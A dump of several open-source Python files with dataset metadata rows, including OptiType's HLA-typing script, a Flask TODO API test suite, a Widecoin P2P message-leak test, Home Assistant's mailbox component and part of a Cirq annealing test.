B*59:01 B*67:01 B*67:02 B*73:01 B*78:01 B*78:02 B*78:03 B*78:05 B*81:01 B*81:02 B*82:01 B*82:02 B*83:01 C*01:02 C*01:03 C*01:04 C*01:05 C*01:06 C*01:08 C*01:14 C*01:17 C*01:30 C*01:32 C*02:02 C*02:03 C*02:04 C*02:06 C*02:08 C*02:09 C*02:10 C*02:19 C*02:20 C*02:27 C*03:02 C*03:03 C*03:04 C*03:05 C*03:06 C*03:07 C*03:08 C*03:09 C*03:10 C*03:13 C*03:14 C*03:15 C*03:16 C*03:17 C*03:19 C*03:21 C*03:32 C*03:42 C*03:43 C*03:56 C*03:67 C*03:81 C*04:01 C*04:03 C*04:04 C*04:05 C*04:06 C*04:07 C*04:10 C*04:11 C*04:14 C*04:15 C*04:24 C*04:29 C*04:33 C*04:37 C*05:01 C*05:03 C*05:04 C*05:07N C*05:09 C*06:02 C*06:03 C*06:04 C*06:06 C*06:08 C*06:09 C*06:17 C*06:24 C*06:53 C*07:01 C*07:02 C*07:03 C*07:04 C*07:05 C*07:06 C*07:07 C*07:08 C*07:09 C*07:10 C*07:109 C*07:123 C*07:13 C*07:14 C*07:17 C*07:18 C*07:19 C*07:21 C*07:22 C*07:27 C*07:29 C*07:32N C*07:37 C*07:43 C*07:46 C*07:49 C*07:56 C*07:66 C*07:67 C*07:68 C*07:80 C*07:95 C*08:01 C*08:02 C*08:03 C*08:04 C*08:05 C*08:06 C*08:13 C*08:15 C*08:20 C*08:21 C*08:27 C*12:02 C*12:03 C*12:04 C*12:05 C*12:07 C*12:12 C*12:15 C*12:16 C*14:02 C*14:03 C*14:04 C*15:02 C*15:03 C*15:04 C*15:05 C*15:06 C*15:07 C*15:08 C*15:09 C*15:11 C*15:12 C*15:13 C*15:17 C*16:01 C*16:02 C*16:04 C*16:08 C*16:09 C*17:01 C*17:02 C*17:03 C*17:04 C*18:01 C*18:02 A*30:07 B*15:64 B*18:12'''.split(' ')
def is_frequent(allele_id):
# prepare for HLA12345_HLA67890 and use the first part
allele_id = allele_id.split('_')[0]
return table.loc[allele_id]['4digit'] in freq_alleles and table.loc[allele_id]['flags'] == 0 or (table.loc[allele_id]['locus'] in 'HGJ')
def get_4digit(allele_id):
allele_id = allele_id.split('_')[0] # for reconstructed IDs like HLA12345_HLA67890 return HLA12345's 4-digit type
return table.loc[allele_id]['4digit']
def get_types(allele_id):
if not isinstance(allele_id, str):
return allele_id
else:
aa = allele_id.split('_')
if len(aa) == 1:
return table.loc[aa[0]]['4digit']
else:
return table.loc[aa[0]]['4digit'] #+ '/' + table.loc[aa[1]]['4digit']
def get_num_threads(configured_threads):
try:
import multiprocessing
except (ImportError, NotImplementedError):
return 2
if(multiprocessing.cpu_count() < configured_threads):
return multiprocessing.cpu_count()
return configured_threads
if __name__ == '__main__':
this_dir = os.path.realpath(os.path.join(os.getcwd(), os.path.dirname(__file__)))
config_default = os.path.join(this_dir, 'config.ini')
parser = argparse.ArgumentParser(description=' OptiType: 4-digit HLA typer', prog='OptiType')
parser.add_argument('--input','-i',
nargs='+',
required=True,
metavar='FQ',
help=(".fastq file(s) (fished or raw) or .bam files stored for re-use, generated by "
"an earlier OptiType run. One file: single-end mode, two files: paired-end mode.")
)
group = parser.add_mutually_exclusive_group(required=True)
group.add_argument('--rna','-r',
action="store_true",
help="Use with RNA sequencing data."
)
group.add_argument('--dna','-d',
action="store_true",
help="Use with DNA sequencing data."
)
parser.add_argument('--beta','-b',
type=float,
metavar='B',
default=0.009,
help="The beta value for for homozygosity detection (see paper). Default: 0.009. Handle with care."
)
parser.add_argument('--enumerate','-e',
type=int,
default=1,
metavar='N',
help=("Number of enumerations. OptiType will output the optimal solution and "
"the top N-1 suboptimal solutions in the results CSV. Default: 1")
)
parser.add_argument('--outdir','-o',
required=True,
help="Specifies the out directory to which all files should be written."
)
parser.add_argument('--prefix', '-p',
default=None, dest="prefix", type=str,
help="Specifies prefix of output files"
)
parser.add_argument('--verbose','-v',
required=False,
action="store_true",
help="Set verbose mode on."
)
parser.add_argument('--config', '-c',
type=argparse.FileType('r'),
default=config_default,
help="Path to config file. Default: config.ini in the same directory as this script"
)
args = parser.parse_args()
if not os.path.isfile(args.config.name):
print ("Config file not found. Place config.ini either alongside this script or use the -c option. "
"See config.ini.example and note that its fields have changed recently.")
sys.exit(-1)
config = configparser.ConfigParser(os.environ)
config.read(args.config.name)
unpaired_weight = config.getfloat('behavior', 'unpaired_weight')
use_discordant = config.getboolean('behavior', 'use_discordant')
if not os.path.exists(args.outdir):
os.makedirs(args.outdir)
# test if inputs are legit:
if args.beta < 0.0 or args.beta >= 0.1:
print("Beta value is not correctly chosen. Please choose another beta value between [0,0.1]")
sys.exit(-1)
if args.enumerate <= 0:
print("The specified number of enumerations must be bigger than %i"%args.enumeration)
sys.exit(-1)
if len(args.input) not in (1, 2):
print("Number of input files can only be 1 (single-end) or 2 (paired-end)")
sys.exit(-1)
input_extension = args.input[0].split('.')[-1]
assert all(ii.endswith('.' + input_extension) for ii in args.input), 'Mixed input file extensions'
bam_input = (input_extension in ('sam', 'bam', 'SAM', 'BAM')) # otherwise treated as fastq
# Constants
VERBOSE = ht.VERBOSE = bool(args.verbose) # set verbosity setting in hlatyper too
COMMAND = "-i 97 -m 99999 --distance-range 0 -pa -tc %d -o %s %s %s"
ALLELE_HDF = os.path.join(this_dir, 'data/alleles.h5')
MAPPING_REF = {'gen': os.path.join(this_dir, 'data/hla_reference_dna.fasta'),
'nuc': os.path.join(this_dir, 'data/hla_reference_rna.fasta')}
MAPPING_CMD = config.get("mapping", "razers3") + " " + COMMAND
date = datetime.datetime.fromtimestamp(time.time()).strftime('%Y_%m_%d_%H_%M_%S')
if args.prefix == None:
prefix = date
out_dir = os.path.join(args.outdir, date)
else:
prefix = args.prefix
out_dir = args.outdir
if not os.path.exists(out_dir):
os.makedirs(out_dir)
if PYSAM_AVAILABLE:
extension = 'bam'
else:
extension = 'sam'
bam_paths = args.input if bam_input else [os.path.join(out_dir, ("%s_%i.%s" % (prefix, i+1, extension))) for i in range(len(args.input))]
# SETUP variables and OUTPUT samples
ref_type = "nuc" if args.rna else "gen"
is_paired = len(args.input) > 1
out_csv = os.path.join(out_dir, ("%s_result.tsv" % prefix))
out_plot = os.path.join(out_dir, ("%s_coverage_plot.pdf" % prefix))
# mapping fished file to reference
if not bam_input:
threads = get_num_threads(config.getint("mapping", "threads"))
if VERBOSE:
print("\nmapping with %s threads..." % threads)
for (i, sample), outbam in zip(enumerate(args.input), bam_paths):
if VERBOSE:
print("\n", ht.now(), "Mapping %s to %s reference..." % (os.path.basename(sample), ref_type.upper()))
subprocess.call(MAPPING_CMD % (threads, outbam,
MAPPING_REF[ref_type], sample), shell=True)
# sam-to-hdf5
table, features = ht.load_hdf(ALLELE_HDF, False, 'table', 'features')
if VERBOSE:
print("\n", ht.now(), "Generating binary hit matrix.")
if is_paired:
# combine matrices for paired-end mapping
pos, read_details = ht.pysam_to_hdf(bam_paths[0])
binary1 = np.sign(pos) # dtype=np.uint16
pos2, read_details2 = ht.pysam_to_hdf(bam_paths[1])
binary2 = np.sign(pos2) # dtype=np.uint16
if not bam_input and config.getboolean('behavior', 'deletebam'):
os.remove(bam_paths[0])
os.remove(bam_paths[1])
id1 = set(binary1.index)
id2 = set(binary2.index)
'''
test if we actually can do paired-end mapping
1) look at the last character 2-1 character if they are always the same if so -> proon them away and do
paired-end
2) if not test if the intersection of ID-binary1 and ID-binary2 has at least 10% of the former read
number -> do paired-end
3) if nothing worked ( perhaps pair-end ID was in the middle or something) raise flag and do single-end
mapping on first input
'''
if len(set([r[-1] for r in id1])) == 1 and len(set([r[-1] for r in id2])) == 1:
# if this case is true you have to edit also all pos,etc,desc indices such that the plotting works correctly
# again .. maybe it is also neccessary to test for the last two characters
cut_last_char = lambda x: x[:-1]
binary1.index = list(map(cut_last_char, binary1.index))
binary2.index = list(map(cut_last_char, binary2.index))
pos.index = list(map(cut_last_char, pos.index))
pos2.index = list(map(cut_last_char, pos2.index))
read_details.index = list(map(cut_last_char, read_details.index))
read_details2.index = list(map(cut_last_char, read_details2.index))
binary_p, binary_mis, binary_un = ht.create_paired_matrix(binary1, binary2)
if binary_p.shape[0] < len(id1) * 0.1:
print(("\nWARNING: Less than 10%% of reads could be paired. Consider an appropriate unpaired_weight setting "
"in your config file (currently %.3f), because you may need to resort to using unpaired reads.") % unpaired_weight)
if unpaired_weight > 0:
if use_discordant:
binary = pd.concat([binary_p, binary_un, binary_mis])
else:
binary = pd.concat([binary_p, binary_un])
else:
binary = binary_p
else:
pos, read_details = ht.pysam_to_hdf(bam_paths[0])
if not bam_input and config.getboolean('behavior', 'deletebam'):
os.remove(bam_paths[0])
binary = np.sign(pos) # dtype=np.uint16
# dimensionality reduction and typing
alleles_to_keep = list(filter(is_frequent, binary.columns))
binary = binary[alleles_to_keep]
if VERBOSE:
print("\n", ht.now(), 'temporary pruning of identical rows and columns')
unique_col, representing = ht.prune_identical_alleles(binary, report_groups=True)
representing_df = pd.DataFrame([[a1, a2] for a1, a_l in representing.items() for a2 in a_l],
columns=['representative', 'represented'])
temp_pruned = ht.prune_identical_reads(unique_col)
if VERBOSE:
print("\n", ht.now(), 'Size of mtx with unique rows and columns:', temp_pruned.shape)
print(ht.now(), 'determining minimal set of non-overshadowed alleles')
minimal_alleles = ht.prune_overshadowed_alleles(temp_pruned)
if VERBOSE:
print("\n", ht.now(), 'Keeping only the minimal number of required alleles', minimal_alleles.shape)
binary = binary[minimal_alleles]
if VERBOSE:
print("\n", ht.now(), 'Creating compact model...')
if is_paired and unpaired_weight > 0:
if use_discordant:
compact_mtx, compact_occ = ht.get_compact_model(binary_p[minimal_alleles],
pd.concat([binary_un, binary_mis])[minimal_alleles], weight=unpaired_weight)
else:
compact_mtx, compact_occ = ht.get_compact_model(binary_p[minimal_alleles],
binary_un[minimal_alleles], weight=unpaired_weight)
else:
compact_mtx, compact_occ = ht.get_compact_model(binary)
allele_ids = binary.columns
groups_4digit = defaultdict(list)
for allele in allele_ids:
type_4digit = get_4digit(allele)
groups_4digit[type_4digit].append(allele)
sparse_dict = ht.mtx_to_sparse_dict(compact_mtx)
threads = get_num_threads(config.getint("ilp", "threads"))
if VERBOSE:
print("\nstarting ilp solver with %s threads..." % threads)
print("\n", ht.now(), 'Initializing OptiType model...')
op = OptiType(sparse_dict, compact_occ, groups_4digit, table, args.beta, 2,
config.get("ilp", "solver"), threads, verbosity=VERBOSE)
result = op.solve(args.enumerate)
if VERBOSE:
print("\n", ht.now(), 'Result dataframe has been constructed...')
result_4digit = result.applymap(get_types)
for iii in ["A1", "A2", "B1", "B2", "C1", "C2"]:
if not iii in result_4digit:
result_4digit[iii] = None
r = result_4digit[["A1", "A2", "B1", "B2", "C1", "C2", "nof_reads", "obj"]]
# write CSV to out. And generate plots
r.to_csv(out_csv, sep="\t",
columns=["A1", "A2", "B1", "B2", "C1", "C2", "nof_reads", "obj"],
header=["A1", "A2", "B1", "B2", "C1", "C2", "Reads", "Objective"])
hlatype = result.iloc[0].reindex(["A1", "A2", "B1", "B2", "C1", "C2"]).drop_duplicates().dropna()
features_used = [('intron', 1), ('exon', 2), ('intron', 2), ('exon', 3), ('intron', 3)] \
if not args.rna else [('exon',2),('exon',3)]
plot_variables = [pos, read_details, pos2, read_details2, (binary_p, binary_un, binary_mis)] if is_paired else [pos, read_details]
coverage_mat = ht.calculate_coverage(plot_variables, features, hlatype, features_used)
ht.plot_coverage(out_plot, coverage_mat, table, features, features_used)
| 53.550228 | 6,125 | 0.622724 |
52373d3ee0f44542bfffa8e81425bb9ba57f03df | 4,686 | py | Python | tests.py | squadran2003/TODO-api-with-flask | 50556c9a78c8a100ff67a5531c08688e48730ffe | [
"MIT"
] | null | null | null | tests.py | squadran2003/TODO-api-with-flask | 50556c9a78c8a100ff67a5531c08688e48730ffe | [
"MIT"
] | null | null | null | tests.py | squadran2003/TODO-api-with-flask | 50556c9a78c8a100ff67a5531c08688e48730ffe | [
"MIT"
] | null | null | null | import unittest
import datetime
import json
from app import app
import base64
from flask.ext.restful import url_for
import models
class TestTodoModel(unittest.TestCase):
def setUp(self):
self.user = models.User.get(username="andy")
self.todo = models.Todo.create(name="go swimming at 10",
user=self.user)
self.assertNotEqual(self.todo.created_at, datetime.datetime.now)
def test_todo_list(self):
todos = models.Todo.select().where(models.Todo.user == self.user)
self.assertIn(self.todo, todos)
class TestUserModel(unittest.TestCase):
def setUp(self):
self.user = models.User.get(username="andy")
def test_user_list(self):
users = models.User.select()
self.assertIn(self.user, users)
class TestTodoApi(unittest.TestCase):
def setUp(self):
self.user = models.User.get(username="andy")
self.client = app.test_client()
self.headers = {
'Authorization':
'Basic %s' % base64.b64encode(b"andy:123").decode("ascii")
}
self.todo = models.Todo.create(name="Get Milk from the shops",
user=self.user)
def test_todos_get(self):
response = self.client.get(url_for('resources.todos.todos'),
headers=self.headers)
myresponse = json.loads(response.get_data())
self.assertTrue(self.check_id_in_json(myresponse, self.todo.id))
def test_todos_post(self):
response = self.client.post(url_for('resources.todos.todos'),
data={'name': 'Go jogging at 10am',
'user': self.user
}, headers=self.headers)
myresponse = json.loads(response.get_data())
self.assertEqual('Go jogging at 10am', myresponse.get('name'))
def test_todos_put(self):
response = self.client.put(url_for('resources.todos.todos'),
data={'id': self.todo.id,
'name': 'Go jogging at 10am',
'user': self.user
}, headers=self.headers)
self.assertNotEqual(response.status_code, 404)
def test_todos_delete(self):
response = self.client.delete(url_for('resources.todos.todos'),
data={'id': self.todo.id,
'name': 'Go jogging at 10am'},
headers=self.headers)
self.assertNotEqual(response.status_code, 404)
def check_id_in_json(self, json_string, id):
"""this method takes a jsonstring and an id,
loops over the json data and checks if the id is in
its values"""
for mydict in json_string:
if id in mydict.values():
return True
class TestUsersApi(unittest.TestCase):
def setUp(self):
self.user = models.User.get(username="andy")
self.client = app.test_client()
self.headers = {
'Authorization':
'Basic %s' % base64.b64encode(b"andy:123").decode("ascii")
}
self.token = ""
def test_users_get(self):
response = self.client.get(url_for('resources.users.users'))
myresponse = json.loads(response.get_data())
self.assertTrue(self.check_username_in_json(myresponse))
def test_user_token(self):
"""this method tests to see if a token is returned"""
response = self.client.get('/api/v1/users/token', headers=self.headers)
myresponse = json.loads(response.get_data())
self.token = myresponse.get('token')
self.assertNotEqual(myresponse, [])
def test_user_token_auth(self):
"""this method will test that the token work
when used as a auth method"""
token_header = {'Authorization': 'token '+self.token}
response = self.client.get(
url_for('resources.todos.todos'),
headers=token_header
)
self.assertTrue(response, 200)
def check_username_in_json(self, json_string):
"""this method takes a jsonstring and an id,
loops over the json data and checks if the id is in
its values"""
for mydict in json_string:
if self.user.username in mydict.values():
return True
if __name__ == '__main__':
app.config['SERVER_NAME'] = '127.0.0.1:8000'
with app.app_context():
unittest.main()
| 36.609375 | 79 | 0.567222 |
06e0a61335b751c4642608486cadb72acd2cff25 | 7,395 | py | Python | test/functional/p2p_leak.py | widecoin-project/widecoin | 143b190a61f95a4b7d40c5da484cdde8f0c5ac3f | [
"MIT"
] | 8 | 2021-04-17T16:11:50.000Z | 2021-06-23T05:30:39.000Z | test/functional/p2p_leak.py | widecoin-project/widecoin | 143b190a61f95a4b7d40c5da484cdde8f0c5ac3f | [
"MIT"
] | 1 | 2021-04-18T11:57:59.000Z | 2021-04-18T11:57:59.000Z | test/functional/p2p_leak.py | widecoin-project/widecoin | 143b190a61f95a4b7d40c5da484cdde8f0c5ac3f | [
"MIT"
] | 7 | 2021-04-17T16:04:12.000Z | 2021-06-10T00:54:53.000Z | #!/usr/bin/env python3
# Copyright (c) 2017-2020 The Widecoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test message sending before handshake completion.
Before receiving a VERACK, a node should not send anything but VERSION/VERACK
and feature negotiation messages (WTXIDRELAY, SENDADDRV2).
This test connects to a node and sends it a few messages, trying to entice it
into sending us something it shouldn't."""
import time
from test_framework.messages import (
msg_getaddr,
msg_ping,
msg_version,
)
from test_framework.p2p import (
P2PInterface,
P2P_SUBVERSION,
P2P_SERVICES,
P2P_VERSION_RELAY,
)
from test_framework.test_framework import WidecoinTestFramework
from test_framework.util import (
assert_equal,
assert_greater_than_or_equal,
)
PEER_TIMEOUT = 3
class LazyPeer(P2PInterface):
def __init__(self):
super().__init__()
self.unexpected_msg = False
self.ever_connected = False
self.got_wtxidrelay = False
self.got_sendaddrv2 = False
def bad_message(self, message):
self.unexpected_msg = True
print("should not have received message: %s" % message.msgtype)
def on_open(self):
self.ever_connected = True
# Does not respond to "version" with "verack"
def on_version(self, message): self.bad_message(message)
def on_verack(self, message): self.bad_message(message)
def on_inv(self, message): self.bad_message(message)
def on_addr(self, message): self.bad_message(message)
def on_getdata(self, message): self.bad_message(message)
def on_getblocks(self, message): self.bad_message(message)
def on_tx(self, message): self.bad_message(message)
def on_block(self, message): self.bad_message(message)
def on_getaddr(self, message): self.bad_message(message)
def on_headers(self, message): self.bad_message(message)
def on_getheaders(self, message): self.bad_message(message)
def on_ping(self, message): self.bad_message(message)
def on_mempool(self, message): self.bad_message(message)
def on_pong(self, message): self.bad_message(message)
def on_feefilter(self, message): self.bad_message(message)
def on_sendheaders(self, message): self.bad_message(message)
def on_sendcmpct(self, message): self.bad_message(message)
def on_cmpctblock(self, message): self.bad_message(message)
def on_getblocktxn(self, message): self.bad_message(message)
def on_blocktxn(self, message): self.bad_message(message)
def on_wtxidrelay(self, message): self.got_wtxidrelay = True
def on_sendaddrv2(self, message): self.got_sendaddrv2 = True
# Peer that sends a version but not a verack.
class NoVerackIdlePeer(LazyPeer):
def __init__(self):
self.version_received = False
super().__init__()
def on_verack(self, message): pass
# When version is received, don't reply with a verack. Instead, see if the
# node will give us a message that it shouldn't. This is not an exhaustive
# list!
def on_version(self, message):
self.version_received = True
self.send_message(msg_ping())
self.send_message(msg_getaddr())
class P2PVersionStore(P2PInterface):
version_received = None
def on_version(self, msg):
# Responds with an appropriate verack
super().on_version(msg)
self.version_received = msg
class P2PLeakTest(WidecoinTestFramework):
def set_test_params(self):
self.num_nodes = 1
self.extra_args = [[f"-peertimeout={PEER_TIMEOUT}"]]
def create_old_version(self, nversion):
old_version_msg = msg_version()
old_version_msg.nVersion = nversion
old_version_msg.strSubVer = P2P_SUBVERSION
old_version_msg.nServices = P2P_SERVICES
old_version_msg.relay = P2P_VERSION_RELAY
return old_version_msg
def run_test(self):
self.log.info('Check that the node doesn\'t send unexpected messages before handshake completion')
# Peer that never sends a version, nor any other messages. It shouldn't receive anything from the node.
no_version_idle_peer = self.nodes[0].add_p2p_connection(LazyPeer(), send_version=False, wait_for_verack=False)
# Peer that sends a version but not a verack.
no_verack_idle_peer = self.nodes[0].add_p2p_connection(NoVerackIdlePeer(), wait_for_verack=False)
# Pre-wtxidRelay peer that sends a version but not a verack and does not support feature negotiation
# messages which start at nVersion == 70016
pre_wtxidrelay_peer = self.nodes[0].add_p2p_connection(NoVerackIdlePeer(), send_version=False, wait_for_verack=False)
pre_wtxidrelay_peer.send_message(self.create_old_version(70015))
# Wait until the peer gets the verack in response to the version. Though, don't wait for the node to receive the
# verack, since the peer never sent one
no_verack_idle_peer.wait_for_verack()
pre_wtxidrelay_peer.wait_for_verack()
no_version_idle_peer.wait_until(lambda: no_version_idle_peer.ever_connected)
no_verack_idle_peer.wait_until(lambda: no_verack_idle_peer.version_received)
pre_wtxidrelay_peer.wait_until(lambda: pre_wtxidrelay_peer.version_received)
# Mine a block and make sure that it's not sent to the connected peers
self.nodes[0].generate(nblocks=1)
# Give the node enough time to possibly leak out a message
time.sleep(PEER_TIMEOUT + 2)
# Make sure only expected messages came in
assert not no_version_idle_peer.unexpected_msg
assert not no_version_idle_peer.got_wtxidrelay
assert not no_version_idle_peer.got_sendaddrv2
assert not no_verack_idle_peer.unexpected_msg
assert no_verack_idle_peer.got_wtxidrelay
assert no_verack_idle_peer.got_sendaddrv2
assert not pre_wtxidrelay_peer.unexpected_msg
assert not pre_wtxidrelay_peer.got_wtxidrelay
assert not pre_wtxidrelay_peer.got_sendaddrv2
# Expect peers to be disconnected due to timeout
assert not no_version_idle_peer.is_connected
assert not no_verack_idle_peer.is_connected
assert not pre_wtxidrelay_peer.is_connected
self.log.info('Check that the version message does not leak the local address of the node')
p2p_version_store = self.nodes[0].add_p2p_connection(P2PVersionStore())
ver = p2p_version_store.version_received
# Check that received time is within one hour of now
assert_greater_than_or_equal(ver.nTime, time.time() - 3600)
assert_greater_than_or_equal(time.time() + 3600, ver.nTime)
assert_equal(ver.addrFrom.port, 0)
assert_equal(ver.addrFrom.ip, '0.0.0.0')
assert_equal(ver.nStartingHeight, 201)
assert_equal(ver.relay, 1)
self.log.info('Check that old peers are disconnected')
p2p_old_peer = self.nodes[0].add_p2p_connection(P2PInterface(), send_version=False, wait_for_verack=False)
with self.nodes[0].assert_debug_log(['peer=4 using obsolete version 31799; disconnecting']):
p2p_old_peer.send_message(self.create_old_version(31799))
p2p_old_peer.wait_for_disconnect()
if __name__ == '__main__':
P2PLeakTest().main()
| 41.312849 | 125 | 0.727654 |
5d05596fb23af36b757e3261dc8f7d2bbe514f3a | 8,147 | py | Python | homeassistant/components/mailbox/__init__.py | tbarbette/core | 8e58c3aa7bc8d2c2b09b6bd329daa1c092d52d3c | [
"Apache-2.0"
] | 5 | 2018-10-23T14:15:05.000Z | 2021-11-26T06:38:44.000Z | homeassistant/components/mailbox/__init__.py | jagadeeshvenkatesh/core | 1bd982668449815fee2105478569f8e4b5670add | [
"Apache-2.0"
] | 79 | 2020-07-23T07:13:37.000Z | 2022-03-22T06:02:37.000Z | homeassistant/components/mailbox/__init__.py | jagadeeshvenkatesh/core | 1bd982668449815fee2105478569f8e4b5670add | [
"Apache-2.0"
] | 6 | 2019-07-06T00:43:13.000Z | 2021-01-16T13:27:06.000Z | """Support for Voice mailboxes."""
import asyncio
from contextlib import suppress
from datetime import timedelta
import logging
from aiohttp import web
from aiohttp.web_exceptions import HTTPNotFound
import async_timeout
from homeassistant.components.http import HomeAssistantView
from homeassistant.const import HTTP_INTERNAL_SERVER_ERROR
from homeassistant.core import callback
from homeassistant.exceptions import HomeAssistantError
from homeassistant.helpers import config_per_platform, discovery
from homeassistant.helpers.entity import Entity
from homeassistant.helpers.entity_component import EntityComponent
from homeassistant.setup import async_prepare_setup_platform
# mypy: allow-untyped-defs, no-check-untyped-defs
_LOGGER = logging.getLogger(__name__)
DOMAIN = "mailbox"
EVENT = "mailbox_updated"
CONTENT_TYPE_MPEG = "audio/mpeg"
CONTENT_TYPE_NONE = "none"
SCAN_INTERVAL = timedelta(seconds=30)
async def async_setup(hass, config):
"""Track states and offer events for mailboxes."""
mailboxes = []
hass.components.frontend.async_register_built_in_panel(
"mailbox", "mailbox", "mdi:mailbox"
)
hass.http.register_view(MailboxPlatformsView(mailboxes))
hass.http.register_view(MailboxMessageView(mailboxes))
hass.http.register_view(MailboxMediaView(mailboxes))
hass.http.register_view(MailboxDeleteView(mailboxes))
async def async_setup_platform(p_type, p_config=None, discovery_info=None):
"""Set up a mailbox platform."""
if p_config is None:
p_config = {}
if discovery_info is None:
discovery_info = {}
platform = await async_prepare_setup_platform(hass, config, DOMAIN, p_type)
if platform is None:
_LOGGER.error("Unknown mailbox platform specified")
return
_LOGGER.info("Setting up %s.%s", DOMAIN, p_type)
mailbox = None
try:
if hasattr(platform, "async_get_handler"):
mailbox = await platform.async_get_handler(
hass, p_config, discovery_info
)
elif hasattr(platform, "get_handler"):
mailbox = await hass.async_add_executor_job(
platform.get_handler, hass, p_config, discovery_info
)
else:
raise HomeAssistantError("Invalid mailbox platform.")
if mailbox is None:
_LOGGER.error("Failed to initialize mailbox platform %s", p_type)
return
except Exception: # pylint: disable=broad-except
_LOGGER.exception("Error setting up platform %s", p_type)
return
mailboxes.append(mailbox)
mailbox_entity = MailboxEntity(mailbox)
component = EntityComponent(
logging.getLogger(__name__), DOMAIN, hass, SCAN_INTERVAL
)
await component.async_add_entities([mailbox_entity])
setup_tasks = [
asyncio.create_task(async_setup_platform(p_type, p_config))
for p_type, p_config in config_per_platform(config, DOMAIN)
]
if setup_tasks:
await asyncio.wait(setup_tasks)
async def async_platform_discovered(platform, info):
"""Handle for discovered platform."""
await async_setup_platform(platform, discovery_info=info)
discovery.async_listen_platform(hass, DOMAIN, async_platform_discovered)
return True
class MailboxEntity(Entity):
"""Entity for each mailbox platform to provide a badge display."""
def __init__(self, mailbox):
"""Initialize mailbox entity."""
self.mailbox = mailbox
self.message_count = 0
async def async_added_to_hass(self):
"""Complete entity initialization."""
@callback
def _mailbox_updated(event):
self.async_schedule_update_ha_state(True)
self.hass.bus.async_listen(EVENT, _mailbox_updated)
self.async_schedule_update_ha_state(True)
@property
def state(self):
"""Return the state of the binary sensor."""
return str(self.message_count)
@property
def name(self):
"""Return the name of the entity."""
return self.mailbox.name
async def async_update(self):
"""Retrieve messages from platform."""
messages = await self.mailbox.async_get_messages()
self.message_count = len(messages)
class Mailbox:
"""Represent a mailbox device."""
def __init__(self, hass, name):
"""Initialize mailbox object."""
self.hass = hass
self.name = name
@callback
def async_update(self):
"""Send event notification of updated mailbox."""
self.hass.bus.async_fire(EVENT)
@property
def media_type(self):
"""Return the supported media type."""
raise NotImplementedError()
@property
def can_delete(self):
"""Return if messages can be deleted."""
return False
@property
def has_media(self):
"""Return if messages have attached media files."""
return False
async def async_get_media(self, msgid):
"""Return the media blob for the msgid."""
raise NotImplementedError()
async def async_get_messages(self):
"""Return a list of the current messages."""
raise NotImplementedError()
async def async_delete(self, msgid):
"""Delete the specified messages."""
raise NotImplementedError()
class StreamError(Exception):
"""Media streaming exception."""
class MailboxView(HomeAssistantView):
"""Base mailbox view."""
def __init__(self, mailboxes):
"""Initialize a basic mailbox view."""
self.mailboxes = mailboxes
def get_mailbox(self, platform):
"""Retrieve the specified mailbox."""
for mailbox in self.mailboxes:
if mailbox.name == platform:
return mailbox
raise HTTPNotFound
class MailboxPlatformsView(MailboxView):
"""View to return the list of mailbox platforms."""
url = "/api/mailbox/platforms"
name = "api:mailbox:platforms"
async def get(self, request: web.Request) -> web.Response:
"""Retrieve list of platforms."""
platforms = []
for mailbox in self.mailboxes:
platforms.append(
{
"name": mailbox.name,
"has_media": mailbox.has_media,
"can_delete": mailbox.can_delete,
}
)
return self.json(platforms)
class MailboxMessageView(MailboxView):
"""View to return the list of messages."""
url = "/api/mailbox/messages/{platform}"
name = "api:mailbox:messages"
async def get(self, request, platform):
"""Retrieve messages."""
mailbox = self.get_mailbox(platform)
messages = await mailbox.async_get_messages()
return self.json(messages)
class MailboxDeleteView(MailboxView):
"""View to delete selected messages."""
url = "/api/mailbox/delete/{platform}/{msgid}"
name = "api:mailbox:delete"
async def delete(self, request, platform, msgid):
"""Delete items."""
mailbox = self.get_mailbox(platform)
await mailbox.async_delete(msgid)
class MailboxMediaView(MailboxView):
"""View to return a media file."""
url = r"/api/mailbox/media/{platform}/{msgid}"
name = "api:asteriskmbox:media"
async def get(self, request, platform, msgid):
"""Retrieve media."""
mailbox = self.get_mailbox(platform)
with suppress(asyncio.CancelledError, asyncio.TimeoutError):
with async_timeout.timeout(10):
try:
stream = await mailbox.async_get_media(msgid)
except StreamError as err:
error_msg = "Error getting media: %s" % (err)
_LOGGER.error(error_msg)
return web.Response(status=HTTP_INTERNAL_SERVER_ERROR)
if stream:
return web.Response(body=stream, content_type=mailbox.media_type)
return web.Response(status=HTTP_INTERNAL_SERVER_ERROR)
| 30.859848 | 83 | 0.651283 |
49c54517d0fdd8a8be6009182c2f8e6f61e1271e | 2,935 | py | Python | cirq-google/cirq_google/line/placement/optimization_test.py | Saibaba-Alapati/Cirq | 782efcd04c3bbf73a0d630306a3d1cfd9966521d | [
"Apache-2.0"
] | 3,326 | 2018-07-18T23:17:21.000Z | 2022-03-29T22:28:24.000Z | cirq-google/cirq_google/line/placement/optimization_test.py | resduo/Cirq | 680f897345eb1c71c9242515edda8f04b8594319 | [
"Apache-2.0"
] | 3,443 | 2018-07-18T21:07:28.000Z | 2022-03-31T20:23:21.000Z | cirq-google/cirq_google/line/placement/optimization_test.py | resduo/Cirq | 680f897345eb1c71c9242515edda8f04b8594319 | [
"Apache-2.0"
] | 865 | 2018-07-18T23:30:24.000Z | 2022-03-30T11:43:23.000Z | # Copyright 2018 The Cirq Developers
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import math
from unittest import mock
import pytest
from cirq_google.line.placement import optimization
def test_accept_accepts():
# Cost constant, should be accepted.
assert optimization._accept(0.0, 0.0, 1.0)[0]
# Cost improved, should be accepted.
assert optimization._accept(0.0, -0.1, 1.0)[0]
# Cost decreased, should be accepted if low sample.
assert optimization._accept(0.0, 1.0, 1.0)[0]
# Cost decreased, should be accepted if below the threshold (exp(-1.0))
assert optimization._accept(1.0 / math.e - 1e-9, 1.0, 1.0)[0]
def test_accept_rejects():
# Cost decreased, should be rejected if high sample.
assert not optimization._accept(1.0 - 1e-9, 1.0, 1.0)[0]
# Cost decreased, should be rejected if above the threshold (exp(-1.0))
assert not optimization._accept(1.0 / math.e + 1e-9, 1.0, 1.0)[0]
def test_anneal_minimize_improves_when_better():
assert (
optimization.anneal_minimize(
'initial',
lambda s: 1.0 if s == 'initial' else 0.0,
lambda s: 'better',
lambda: 1.0,
1.0,
0.5,
0.5,
1,
)
== 'better'
